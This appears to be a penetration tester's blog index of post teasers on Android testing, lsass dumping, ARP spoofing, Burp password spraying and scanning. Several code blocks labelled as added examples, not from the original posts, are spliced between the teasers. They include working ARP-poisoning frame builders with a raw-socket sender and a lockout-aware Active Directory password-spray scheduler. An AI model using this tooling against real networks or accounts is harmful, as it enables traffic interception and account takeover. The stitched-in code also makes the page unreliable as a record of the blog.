I was working for a very large corporation that has many subsidiaries and they were buying up smaller companies. We needed to send out a dropbox (Raspberry Pi or Intel NUC) that we could have a remote office plug into the network for internal pentesting, and it establishes an SSH tunnel to our server regardless of network restrictions in the remote office.
Android Testing Cheatsheet - Configuring tools and a mobile device for Android app testing and finding vulnerabilities. Updated on 4/20/2020
How to use the Objection framework with Frida to reverse engineer an Android app to bypass root detection.
This is my listing of iOS and Android assessment tools for my personal bookmarks.
Ruby-Nessus is a Ruby interface for the popular Nessus vulnerability scanner. Ruby-Nessus aims to deliver an easy yet powerful interface for interacting with and manipulating Nessus scan results and configurations. Ruby-Nessus currently supports both version 1.0 and 2.0 of the .nessus file format.
Update: CrackMapExec now includes the ‘lsassy’ module, which automates the following steps. While the article below still works, if you need to dump lsass across multiple hosts I’d use CrackMapExec, as the steps below take a lot more time.
While testing web applications, I monitor the application using Wireshark to see if the app is using a protocol that lacks support in Burp Suite, like HTTP/2. This post shows how to decrypt TLS traffic in Wireshark on Kali Linux.
One of the prerequisites for using jackit with a CrazyRadio PA USB dongle is first flashing it using mousejack. This has always been problematic when using VMware. I was getting the error “The connection for the USB device ‘Nordic ASA nRF24LU1P-F32 BOOT LDR’ was unsuccessful.” which looked like a VMware dialog, not a dialog generated by the virtual machine (Kali Linux).
Update: This post is outdated. The Kali repos are fixed and now the best way to install PowerShell on Kali is to run this command:
apt update && apt -y install powershell
Sure, there are already some pretty good security tools that can pull off ARP spoofing: Ettercap, Bettercap, etc. This post details what I learned when I wanted to do it myself using Scapy, in the hopes that I can help someone else who’s also trying to learn how to use Scapy. After a while you get tired of using other people’s tools and want to learn how to do it yourself. Even if you’re just creating yet another tool to do ‘X’, at least you’re learning something new.
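As an added illustration of what an ARP spoof actually puts on the wire (this is not the post's Scapy code; it builds the frames by hand with the standard library so it runs without Scapy), the block below constructs the two "is-at" replies that poison a victim and its gateway, the matching pair that restores the real mappings when you stop, and a parser to check the bytes. The MAC and IP addresses are made up for the demo; send_frames() needs root on Linux and is not called here.

```python
# Added example, not from the original post: hand-built Ethernet+ARP frames for
# an ARP spoof, standard library only (no Scapy needed).
import socket
import struct

ETH_P_ARP = 0x0806
ARP_FMT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa
ARP_REPLY = 2


def mac_bytes(mac):
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    parts = mac.split(":")
    if len(parts) != 6:
        raise ValueError("bad MAC: %r" % mac)
    return bytes(int(p, 16) for p in parts)


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Unicast ARP reply to target telling it that sender_ip is at sender_mac.
    This is the poisoning primitive: put the attacker's MAC in sender_mac."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(ARP_FMT,
                      1,            # hardware type: Ethernet
                      0x0800,       # protocol type: IPv4
                      6, 4,         # address lengths
                      ARP_REPLY,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode a 42-byte Ethernet+ARP frame back into its fields."""
    _dst, _src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _ht, _pt, _hl, _pl, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"op": op,
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def poison_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """Victim learns gateway_ip -> attacker_mac; gateway learns victim_ip -> attacker_mac.
    Resend these every second or two, since ARP cache entries age out."""
    return [build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),
            build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)]


def restore_pair(victim_mac, victim_ip, gateway_mac, gateway_ip):
    """Correct mappings to send when you stop so the LAN is not left broken."""
    return [build_arp_reply(gateway_mac, gateway_ip, victim_mac, victim_ip),
            build_arp_reply(victim_mac, victim_ip, gateway_mac, gateway_ip)]


def send_frames(iface, frames):
    """Raw AF_PACKET send; Linux only and requires root. Not run in tests."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as s:
        s.bind((iface, 0))
        for frame in frames:
            s.send(frame)
```

Two practical notes: enable IP forwarding (sysctl net.ipv4.ip_forward=1) before poisoning or you have built a denial of service rather than a man-in-the-middle, and always send the restore_pair() frames on exit.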
Sometimes you may want to manually establish TCP 3-way handshakes when you’re using Python Scapy, but wouldn’t it be nice to use sockets to maintain the TCP handshake and pass the data to/from Scapy? If you don’t really care about the TCP handshake and want that taken care of while you fuzz the data, here’s an easy way using a StreamSocket with Scapy:
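The idea in the teaser, as an added example that is not the post's own code: let the kernel complete the three-way handshake and fuzz only the application payload over an ordinary socket. The loopback "target" below is constructed for the demo (it answers one line per connection and silently closes on oversized input to mimic a crash); the fuzz client is the part you would point at a real service, and the connected socket it opens is exactly what you would hand to Scapy's StreamSocket(sock, Raw) if you want sr1() on top of it.

```python
# Added example, not the original post's Scapy snippet: socket-handled TCP
# handshake, hand-fuzzed payload, with a constructed loopback target.
import socket
import threading

MAX_LINE = 1024  # constructed target "crashes" (closes without answering) above this


def start_target():
    """Constructed loopback service for the demo. Replies 'OK <len>' to one
    line per connection, but drops the connection on lines over MAX_LINE."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))            # ephemeral port
    srv.listen(8)
    srv.settimeout(0.5)                   # lets the accept loop notice close()
    port = srv.getsockname()[1]

    def serve():
        while srv.fileno() != -1:
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:               # listener closed: stop serving
                return
            with conn:
                rfile = conn.makefile("rb")
                line = rfile.readline()
                rfile.close()
                if len(line) > MAX_LINE:
                    continue              # simulated crash: close with no reply
                conn.sendall(b"OK %d\n" % len(line))

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def mutate(seed):
    """Deterministic mutations of a newline-terminated seed message."""
    body = seed.rstrip(b"\r\n")
    cases = [body + b"\n"]                                  # baseline
    cases.append(body + b"A" * 2000 + b"\n")                # length extension
    cases.append(body.replace(b" ", b"\x00", 1) + b"\n")    # embedded NUL
    for i in range(len(body)):                              # single-byte flips
        flipped = bytearray(body)
        flipped[i] ^= 0xFF
        cases.append(bytes(flipped) + b"\n")
    return cases


def fuzz(port, payloads, host="127.0.0.1", timeout=2.0):
    """One fresh connection per payload; classify the target's reaction."""
    results = []
    for payload in payloads:
        # create_connection() performs the SYN/SYN-ACK/ACK for us
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(payload)
            try:
                resp = s.recv(4096)
                status = "ok" if resp else "closed"   # b"" means the peer closed
            except socket.timeout:
                resp, status = b"", "timeout"         # hung: worth a closer look
            except ConnectionResetError:
                resp, status = b"", "reset"
        results.append({"payload": payload, "status": status, "response": resp})
    return results


def run_demo():
    srv, port = start_target()
    try:
        return fuzz(port, mutate(b"HELLO fuzz\n"))
    finally:
        srv.close()
```

The statuses other than "ok" are the interesting ones: "closed" or "reset" right after a long input is the classic sign of a crash handler, and "timeout" usually means the parser got stuck.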
I frequently use the Intruder tab in Burp Suite Pro to password spray websites which use Active Directory authentication. One of the problems with using Burp Suite is that there doesn’t seem to be a way to avoid lockout when using a long password list. Frequently I don’t get a hit on a valid password on the first try with Season/Year stuff like “Winter2018!” and need to run through a list of 51 common AD passwords that I have in a file. Sure, I can paste in a list of three or four passwords (depending on my client’s lockout policy), but then I have to wait X minutes, replace those passwords with three or four more, track the time between password spray runs, etc. That’s a manual process, and I’d prefer something that I can set up and just let run to completion.
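The scheduling problem described above, as an added example rather than the post's Burp workflow: batch the password list so no account sees more failures than the domain lockout threshold (minus a safety margin) inside one observation window, sleep until the window has elapsed, then continue. The attempt() callback, user list and passwords are placeholders you replace with your own; sleep is injectable so the schedule can be checked without waiting.

```python
# Added example, not from the original post: lockout-aware password spray
# scheduler for an AD lockout policy (threshold + observation window).
import time


def plan_rounds(passwords, lockout_threshold, safety_margin=2):
    """Split passwords into rounds of (threshold - margin). The margin covers
    users who already carry a stray failed logon or two on badPwdCount."""
    if lockout_threshold <= 0:
        return [list(passwords)]          # threshold 0 means no lockout policy
    per_round = lockout_threshold - safety_margin
    if per_round < 1:
        raise ValueError("lockout threshold too low to spray safely")
    return [passwords[i:i + per_round] for i in range(0, len(passwords), per_round)]


def spray(users, passwords, attempt, lockout_threshold, window_minutes,
          safety_margin=2, sleep=time.sleep):
    """attempt(user, password) -> bool is your auth check (HTTP form, LDAP
    bind, etc.). Returns (hits, round_log)."""
    rounds = plan_rounds(passwords, lockout_threshold, safety_margin)
    hits = {}
    remaining = list(users)
    log = []
    for idx, batch in enumerate(rounds):
        for pw in batch:
            for user in list(remaining):   # one password across all users
                if attempt(user, pw):
                    hits[user] = pw
                    remaining.remove(user) # stop touching cracked accounts
        log.append({"round": idx, "passwords": batch, "hits_so_far": len(hits)})
        if not remaining:
            break
        if idx < len(rounds) - 1:
            # badPwdCount only resets after the observation window
            # (ResetLockoutCounterAfter) passes with no new failures
            sleep(window_minutes * 60)
    return hits, log


def demo_attempt(user, password):
    """Constructed stand-in for the real auth check."""
    return (user, password) == ("bob", "Winter2018!")
```

Read the threshold and window from the domain first (net accounts /domain, or the PSO if fine-grained password policies are in use) rather than assuming; a default domain policy and a PSO applied to the group you are spraying can differ.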
ScanCannon - Runs Masscan, followed up by Nmap for service version info. This should finish scans much faster than Nmap alone while providing service version info that Masscan doesn’t provide.
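As an added illustration of the Masscan-then-Nmap hand-off (this is not ScanCannon's own code): parse Masscan's open-port output, group hosts that share the same open port set, and emit one nmap -sV run per group. It assumes Masscan list output (-oL) with lines of the form "open tcp 22 10.0.0.5 1585000000" and '#' comment lines; the sample text is constructed for the demo.

```python
# Added example, not ScanCannon's code: masscan -oL -> grouped nmap -sV commands.
import subprocess
from collections import defaultdict

# Constructed sample of masscan list output (-oL) for the demo.
SAMPLE_MASSCAN_LIST = """#masscan
open tcp 22 10.0.0.5 1585000000
open tcp 80 10.0.0.5 1585000001
open tcp 443 10.0.0.7 1585000002
open tcp 80 10.0.0.9 1585000003
open tcp 22 10.0.0.9 1585000004
open udp 161 10.0.0.7 1585000005
# end
"""


def parse_masscan_list(text):
    """Return {host: set(open tcp ports)} from masscan -oL text (udp ignored)."""
    hosts = defaultdict(set)
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 4 or parts[0] != "open":
            continue
        _state, proto, port, host = parts[:4]
        if proto != "tcp":
            continue
        hosts[host].add(int(port))
    return dict(hosts)


def group_by_portset(hosts):
    """Hosts with identical port sets share one nmap run, since -p applies
    to every target on the command line."""
    groups = defaultdict(list)
    for host, ports in sorted(hosts.items()):
        groups[tuple(sorted(ports))].append(host)
    return groups


def nmap_commands(hosts, outdir="nmap"):
    """Build argv lists: version detection only on ports masscan found open,
    no ping and no DNS since discovery is already done."""
    cmds = []
    for ports, targets in group_by_portset(hosts).items():
        portspec = ",".join(str(p) for p in ports)
        tag = "%s/ports_%s" % (outdir, portspec.replace(",", "_"))
        cmds.append(["nmap", "-sV", "-Pn", "-n", "-p", portspec, "-oA", tag] + targets)
    return cmds


def run_nmap(cmds, dry_run=True):
    """Execute the commands (dry_run just returns them as strings)."""
    rendered = [" ".join(c) for c in cmds]
    if not dry_run:
        for c in cmds:
            subprocess.run(c, check=False)
    return rendered
```

If you feed it real output, keep the Masscan rate sane on client networks; the speed-up comes from letting Nmap probe only the handful of ports Masscan already confirmed.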
The one thing that changed my life was when I read about interest vs. commitment. Too often I hear people wish that things were different, or they want things they will never have or accomplish because they don’t know what it means to be committed to something, so they wander through life like a leaf on a stream, never knowing they are holding themselves back, and maybe they blame others or circumstance.
I got tired of maintaining my own WordPress blog, and issues with WordPress on Digital Ocean resulted in my database going down repeatedly. Now I’m hosting on github.io and don’t have to worry about site security, databases, etc., just write and publish!